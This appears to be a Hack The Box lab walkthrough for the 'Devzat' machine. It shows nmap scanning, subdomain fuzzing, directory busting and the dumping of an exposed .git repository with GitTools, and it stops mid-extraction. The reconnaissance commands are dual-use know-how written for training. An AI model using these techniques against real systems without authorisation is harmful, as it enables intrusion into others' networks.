Devzat is rated at a medium box and had pretty cool stuff on it that could lead down some rabbit holes.

Nmap scan

# Nmap 7.92 scan initiated Tue Mar  8 22:37:35 2022 as: nmap -vvv -sC -sV -p- -o fullTCP.nmap
Nmap scan report for
Host is up, received reset ttl 63 (0.021s latency).
Scanned at 2022-03-08 22:37:36 EST for 49s
Not shown: 65532 closed tcp ports (reset)
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDNaY36GNxswLsvQjgdNt0oBgiJp/OExsv55LjY72WFW03eiJrOY5hbm5AjjyePPTm2N9HO7uK230THXoGWOXhrlzT3nU/g/DkQyDcFZioiE7M2eRIK2m4egM5SYGcKvXDtQqSK86ex4I31Nq6m9EVpVWphbLfvaWjRmIgOlURo+P76WgjzZzKws42mag2zIrn5oP+ODhOW/3ta289/EMYS6phUbBd0KJIWm9ciNfKA2D7kklnuUP1ZRBe2DbSvd2HV5spoLQKmtY37JEX7aYdETjDUHvTqgkWsVCZAa5qNswPEV7zFlAJTgtW8tZsjW86Q0H49M5dUPra4BEXfZ0/idJy+jpMkbfj6+VjlsvaxxvNUEVrbPBXe9SlbeXdrNla5nenpbwtWNhckUlsEZjlpv8VnHqXt99s1mfHJkgO+yF09gvVPVdglDSqMAla8d2rfaVD68RfoGQc10Af6xiohSOA8LIa0f4Yaw+PjLlcylF5APDnSjtQvHm8TnQyRaVM=
|   256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCenH4vaESizD5ZgkV+1Yo3MJH9MfmUdKhvU+2Z2ShSSWjp1AfRmK/U/rYaFOoeKFIjo1P4s8fz3eXr3Pzk/X80=
|   256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKTxLGFW04ssWG0kheQptJmR5sHKtPI2G+zh4FVF0pBm
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://devzat.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
8000/tcp open  ssh     syn-ack ttl 63 (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-Go
| ssh-hostkey: 
|   3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTPm8Ze7iuUlabZ99t6SWJTw3spK5GP21qE/f7FOT/P+crNvZQKLuSHughKWgZH7Tku7Nmu/WxhZwVUFDpkiDG1mSPeK6uyGpuTmncComFvD3CaldFrZCNxbQ/BbWeyNVpF9szeVTwfdgY5PNoQFQ0reSwtenV6atEA5WfrZzhSZXWuWEn+7HB9C6w1aaqikPQDQSxRArcLZY5cgjNy34ZMk7MLaWciK99/xEYuNEAbR1v0/8ItVv5pyD8QMFD+s2NwHk6eJ3hqks2F5VJeqIZL2gXvBmgvQJ8fBLb0pBN6xa1xkOAPpQkrBL0pEEqKFQsdJaIzDpCBGmEL0E/DfO6Dsyq+dmcFstxwfvNO84OmoD2UArb/PxZPaOowjE47GRHl68cDIi3ULKjKoMg2QD7zrayfc7KXP8qEO0j5Xws0nXMll6VO9Gun6k9yaXkEvrFjfLucqIErd7eLtRvDFwcfw0VdflSdmfEz/NkV8kFpXm7iopTKdcwNcqjNnS1TIs=
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
# Nmap done at Tue Mar  8 22:38:25 2022 -- 1 IP address (1 host up) scanned in 49.45 seconds
fullTCP.nmap (END)

When navigating to it automatically redirects me to devzat.htb.. With this being said, we can add it to our local /etc/hosts file for virtual hosting.

![[Pasted image 20220309180156.png]]

At the bottom of the page it seems we can connect to some form of a chat server on port 8000. That port also showed up on our nmap scan as SSH

![[Pasted image 20220309180341.png]]

Also we can rip a potential username out of the page source code by inspecting it within our web browser.

![[Pasted image 20220309180430.png]]

Port 8000 - First connection

Using the syntax found on the default web page, we can connect to the chat server.

╭─    ~/Hackthebox/Devzat  on   master ?10 ································· ✔  at 18:02:55  ─╮
╰─ ssh -l evilman devzat.htb -p 8000                                                                   ─╯
Welcome to the chat. There are no more users
devbot: evilman has joined the chat
evilman: /heml
[SYSTEM] Command not found..? Check /help for a list of commands
evilman: /help
[SYSTEM] Welcome to Devzat! Devzat is chat over SSH:
[SYSTEM] Because there's SSH apps on all platforms, even on mobile, you can join from anywhere.
[SYSTEM] Interesting features:
[SYSTEM] • Many, many commands. Run /commands.
[SYSTEM] • Rooms! Run /room to see all rooms and use /room #foo to join a new room.
[SYSTEM] • Markdown support! Tables, headers, italics and everything. Just use in place of newlines.
[SYSTEM] • Code syntax highlighting. Use Markdown fences to send code. Run /example-code to see an
[SYSTEM] • Direct messages! Send a quick DM using =user <msg> or stay in DMs by running /room @user.
[SYSTEM] • Timezone support, use /tz Continent/City to set your timezone.
[SYSTEM] • Built in Tic Tac Toe and Hangman! Run /tic or /hang <word> to start new games.
[SYSTEM] • Emoji replacements! (like on Slack and Discord)
[SYSTEM] For replacing newlines, I often use
[SYSTEM] Made by Ishan Goel with feature ideas from friends.
[SYSTEM] Thanks to Caleb Denio for lending his server!
[SYSTEM] For a list of commands run
[SYSTEM] ┃ /commands

I spent some time fiddling with this but let’s leave it alone for now as it will be a huge part of the box later on.

Futher enumerating the web server, we can find it has a subdomain by brute forcing some from a common wordlist.. Guessing game

╭─    ~/Hackthebox/Devzat  on   master ?10 ···································································································· ✔  at 18:07:58  ─╮
╰─ wfuzz -c -f subdomainBF -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u 'http://devzat.htb' -H "Host: FUZZ.devzat.htb" --hw 26                ─╯
 /usr/lib/python3/dist-packages/wfuzz/ UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
* Wfuzz 3.1.0 - The Web Fuzzer                         *

Target: http://devzat.htb/
Total requests: 19966

ID           Response   Lines    Word       Chars       Payload                                                                                                     

000003745:   200        20 L     35 W       510 Ch      "pets"   

Wfuzz shows that the site has a subdomain of pets.devzat.htb. We can add that to our /etc/hosts and browse to the site.

![[Pasted image 20220309181014.png]]

Let’s fire up dirb to do some directory busting.

─    ~/Hackthebox/Devzat  on   master ?10 ···································································································· ✔  at 18:09:41  ─╮
╰─ dirb http://pets.devzat.htb                                                                                                                                            ─╯

DIRB v2.22    
By The Dark Raver

START_TIME: Wed Mar  9 18:11:30 2022
URL_BASE: http://pets.devzat.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: http://pets.devzat.htb/ ----
+ http://pets.devzat.htb/.git/HEAD (CODE:200|SIZE:23)       

Looks like we found a .git directory!

╰─ curl http://pets.devzat.htb/.git/                                                                                                                                      ─╯
<a href="HEAD">HEAD</a>
<a href="branches/">branches/</a>
<a href="config">config</a>
<a href="description">description</a>
<a href="hooks/">hooks/</a>
<a href="index">index</a>
<a href="info/">info/</a>
<a href="logs/">logs/</a>
<a href="objects/">objects/</a>
<a href="refs/">refs/</a>

I will use two common tools in the next section listed here

  • - using to download.git repositories from webservers which do not have directory listing enabled.
  • - This is a script which tries to recover incomplete git repositories:
    • Iterate through all commit-objects of a repository
    • Try to restore the contents of the commit
    • Commits are not sorted by date
   ~/Hackthebox/Devzat  on   master ?10 ···································································································· ✔  at 18:15:17  ─╮
╰─ git clone                                                                                                                ─╯
Cloning into 'GitTools'...
remote: Enumerating objects: 242, done.
remote: Counting objects: 100% (33/33), done.
remote: Compressing objects: 100% (26/26), done.
remote: Total 242 (delta 9), reused 14 (delta 4), pack-reused 209
Receiving objects: 100% (242/242), 56.48 KiB | 2.26 MiB/s, done.
Resolving deltas: 100% (88/88), done.

╭─    ~/Hackthebox/Devzat  on   master ?11 ···································································································· ✔  at 18:15:21  ─╮
╰─ cd GitTools                                                                                                                                                            ─╯
╭─    ~/Hackthebox/Devzat/GitTools  on   master ··························································································· INT ✘  at 18:17:08  ─╮
╰─ cd Dumper                                                                                                                                                              ─╯
╭─    ~/Hackthebox/Devzat/GitTools/Dumper  on   master ···················································································· INT ✘  at 18:17:36  ─╮
╰─ chmod +x                                                                                                                                                  ─╯

╭─    ~/Hackthebox/Devzat/GitTools/Dumper  on   master ························································································ ✔  at 18:17:41  ─╮
╰─ ./ http://pets.devzat.htb/.git/ /home/kali/Hackthebox/Devzat/git                                                                                           ─╯
# GitDumper is part of
# Developed and maintained by @gehaxelt from @internetwache
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!

[*] Destination folder does not exist
[+] Creating /home/kali/Hackthebox/Devzat/git/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/ef/07a04ebb2fc92cf74a39e0e4b843630666a705
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/82/74d7a547c0c3854c074579dfc359664082a8f6
[+] Downloaded: objects/46/4614f32483e1fde60ee53f5d3b4d468d80ff62
[+] Downloaded: objects/55/1abaa3c707703936e5e31b8e4645b35e5f6c07
[+] Downloaded: objects/3a/e86c86b0053b79cdbfc1456d6059986a9d3813
[+] Downloaded: objects/8d/a69971e32e6e08cae489b40731845d1de13258
[+] Downloaded: objects/93/28c7f72254a754c91fddfd3c7e62c1251a2828
[+] Downloaded: objects/2f/37bf8e3a0ce61b74fec752fad017c363511d31
[+] Downloaded: objects/69/f1153887d2790c94f23a00c6f85958cf198418
[+] Downloaded: objects/53/5028803d222b0e4e9174f56529c0ed9fece4e0
[+] Downloaded: objects/54/f95a54c49178dd5d496058e4ee99829748c49a
[+] Downloaded: objects/28/a51e070175ab78da05529ff059367df9df3e57
[+] Downloaded: objects/5b/2f2f4b425c4a753d5fb1bd01df5c2389dd95e0
[+] Downloaded: objects/d5/84aafd3a034f1f93b4c2cfa285a77798965c2d
[+] Downloaded: objects/1d/69311c0a33ed5f21e8384641b310cc24e5701c
[+] Downloaded: objects/3e/967e5015bbcd3460dd43f8acc05b3125eac4cd
[+] Downloaded: objects/68/27c53e0d5e2f69f9fa7eb4f5b4b05ee429f539
[+] Downloaded: objects/6f/3c2fa527470bae3ce951717b431c2fe5c38332
[+] Downloaded: objects/d9/2ef698d7cbc3c1014a125e4dcd53be770d5beb
[+] Downloaded: objects/b0/00a57acd3e3027fac564a394704a66c824b76d
[+] Downloaded: objects/bc/b397a0fe8794bf9f03b934812f1efee5533f34
[+] Downloaded: objects/7e/58517e9052d2ce28d12c549dc6ad30423e4c15
[+] Downloaded: objects/94/caeb6c465d2de18aa8cf364c56dd7515ea2a1a
[+] Downloaded: objects/46/24e1f42ce009c31dba5a7c05df4c74472bd5be
[+] Downloaded: objects/47/a0383d182b9413440099ee04c25954e08494e8
[+] Downloaded: objects/3c/6dd07ff39376f9d6f513b06167cc46b3a5af98
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[-] Downloaded: objects/14/55191522836685180664062572759576141834
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[-] Downloaded: objects/e1/42108547152020037174224853515625710542
[-] Downloaded: objects/11/10223024625156540423631668090820312555
[-] Downloaded: objects/13/87778780781445675529539585113525390625
[-] Downloaded: objects/69/38893903907228377647697925567626953125
[-] Downloaded: objects/34/69446951953614188823848962783813476562
[-] Downloaded: objects/17/34723475976807094411924481391906738281
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[-] Downloaded: objects/b4/050a850c04b3abf54132565044b0b7d7bfd8ba
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[-] Downloaded: objects/50/63979466701508701963067355791626002630
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[-] Downloaded: objects/28/9a147ce9da3113b5f0b8c00a60b1ce1d7e819d
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[-] Downloaded: objects/55/02f25dbf55296c3a545e3872760ab7b3312fa7
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[-] Downloaded: objects/1e/f451fd46b503f0011839296a789a3bc0045c8a
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[-] Downloaded: objects/66/2c97ee72995ef42640c550b9013fad0761353c
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[-] Downloaded: objects/94/35300143305409394463459185543183397656
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[-] Downloaded: objects/37/12198799971664381257402829111505715168
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[-] Downloaded: objects/53/00143305409394463459185543183397655394
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[-] Downloaded: objects/00/01020304050607080910111213141516171819
[-] Downloaded: objects/20/21222324252627282930313233343536373839
[-] Downloaded: objects/40/41424344454647484950515253545556575859
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[-] Downloaded: objects/80/81828384858687888990919293949596979899
[-] Downloaded: objects/00/01123333333333444444444455666677777888
[+] Downloaded: objects/da/93220bc34984be11385afbbe6cd044e7b455eb
[+] Downloaded: objects/7b/1ba8363499e091996af78355e71d504b220312
[+] Downloaded: objects/03/cd4553f4c458eaef2f9734925b4e6e8c0d6df9
[+] Downloaded: objects/bd/7e818ef2c4c78fe5f61a0285df390aa3fa0e43
[+] Downloaded: objects/a4/04baa1852e12d51e5941285100091e9380bb03
[+] Downloaded: objects/7c/8dc57a3e2266715fac1ccdb4d677982154c16d
[+] Downloaded: objects/d5/eee74298e64b35d51a1ded2a482ae9cbbfd3c1
[+] Downloaded: objects/17/b8e146f96cd4cd6bd9d5a9215ade0e8cad656e
[+] Downloaded: objects/1b/ac702fbb64129fc77d16b3e0c6652cf2ebc852
[+] Downloaded: objects/59/b0e7c7cdc9f76c39eac534d56f2d92d1f995fe
[+] Downloaded: objects/5d/cebd6a2a7127228bf4330ae18b78785942ec19
[+] Downloaded: objects/47/7b607f55d0d610decf739027ad1cad7846e8a1
[+] Downloaded: objects/50/a0732c90552ff2e7ddd92d79fa964c0d9cd5eb
[+] Downloaded: objects/e1/e271c00e31d309e9bab411caeef86d6d6d0d57
[+] Downloaded: objects/ae/444e098873c82b664e7e6204594e5db26126ff
[+] Downloaded: objects/bb/28a9414d456a3e71bc1ffca30e95b98f6dc2f1
[+] Downloaded: objects/d0/5ea581fbbf17eb0d3139f9937ac6a8fde98685
[+] Downloaded: objects/4e/48a46697302eb89d858229ec12ad23edd9b259
[+] Downloaded: objects/fc/567cd2f11d83683d9eb4ca1a5fdc912f7d417c
[+] Downloaded: objects/db/70e73e473f8ed16d596ab0fd373f3423fc8512
[+] Downloaded: objects/b8/a8f656e1607a2c36884d3165872ef3515b5879
[+] Downloaded: objects/fa/e180dacc52937c1d6a24636431663d6754fef5
[+] Downloaded: objects/9d/ba8c340bf81622be7b48a7a3546869bfb851d4
[+] Downloaded: objects/d1/ac9ba1169e4076832034c5585e1c5bf9d6f83c
[+] Downloaded: objects/e9/f54b13d5e925602e04501415ced4bc0bc881d2
[+] Downloaded: objects/9d/f490e8cfdd75704d31f518caf76ab34494b124
[+] Downloaded: objects/af/e315244f6dae3beda0159693d25a6e0466dd90
[+] Downloaded: objects/dc/e459d0e5a832b08688e2331557535d60d8a171
[+] Downloaded: objects/f3/3e8162997aaa9da582aa81428ee87aa48953a6
[+] Downloaded: objects/73/c1a4d5d156b6ddc62a7e3eba1c206bd6ad19c8
[+] Downloaded: objects/dc/52d954d8d7f62c82cf63236d27093764a3d046

All of these files will be dumped into /home/kali/Hackthebox/Devzat/git/.git/.. Now let’s extract them into /home/kali/Hackthebox/Devzat/gitdump

    ~/Hackthebox/Devzat/GitTools/Dumper  on   master ··········································································· ✔  took 13s   at 18:18:01  ─╮
╰─ cd ../Extractor                                                                                                                                                        ─╯

╭─    ~/Hackthebox/Devzat/GitTools/Extractor  on   master ····················································································· ✔  at 18:19:19  ─╮
╰─ chmod +x                                                                                                                                                  ─╯

╭─    ~/Hackthebox/Devzat/GitTools/Extractor  on   master ····················································································· ✔  at 18:19:49  ─╮
╰─ ./ /home/kali/Hackthebox/Devzat/git /home/kali/Hackthebox/Devzat/gitdump                                                                                   ─╯
# Extractor is part of
# Developed and maintained by @gehaxelt from @internetwache
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
[*] Destination folder does not exist
[*] Creating...
[+] Found commit: ef07a04ebb2fc92cf74a39e0e4b843630666a705
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/.gitignore
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/characteristics
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/characteristics/bluewhale
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/characteristics/cat
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/characteristics/dog
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/characteristics/giraffe
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/characteristics/gopher
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/characteristics/petshop
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/characteristics/redkite
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/go.mod
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/go.sum
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/main.go
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/petshop
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/.gitignore
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/package.json
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/css
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/css/all.min.css
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/css/bootstrap.min.css
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/css/global.css
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/favicon.ico
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/index.html
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-brands-400.eot
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-brands-400.svg
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-brands-400.ttf
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-brands-400.woff
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-brands-400.woff2
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-regular-400.eot
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-regular-400.svg
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-regular-400.ttf
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-regular-400.woff
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-regular-400.woff2
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-solid-900.eot
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-solid-900.svg
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-solid-900.ttf
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-solid-900.woff
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/public/webfonts/fa-solid-900.woff2
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/rollup.config.js
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/src
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/src/App.svelte
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/0-ef07a04ebb2fc92cf74a39e0e4b843630666a705/static/src/main.js
[+] Found commit: 464614f32483e1fde60ee53f5d3b4d468d80ff62
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/.gitignore
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/characteristics
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/characteristics/bluewhale
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/characteristics/cat
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/characteristics/dog
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/characteristics/giraffe
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/characteristics/gopher
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/characteristics/petshop
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/characteristics/redkite
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/go.mod
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/go.sum
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/main.go
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/petshop
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/.gitignore
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/package.json
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/css
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/css/all.min.css
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/css/bootstrap.min.css
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/css/global.css
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/favicon.ico
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/index.html
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-brands-400.eot
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-brands-400.svg
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-brands-400.ttf
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-brands-400.woff
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-brands-400.woff2
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-regular-400.eot
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-regular-400.svg
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-regular-400.ttf
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-regular-400.woff
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-regular-400.woff2
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-solid-900.eot
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-solid-900.svg
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-solid-900.ttf
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-solid-900.woff
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/public/webfonts/fa-solid-900.woff2
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/rollup.config.js
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/src
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/src/App.svelte
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/1-464614f32483e1fde60ee53f5d3b4d468d80ff62/static/src/main.js
[+] Found commit: 8274d7a547c0c3854c074579dfc359664082a8f6
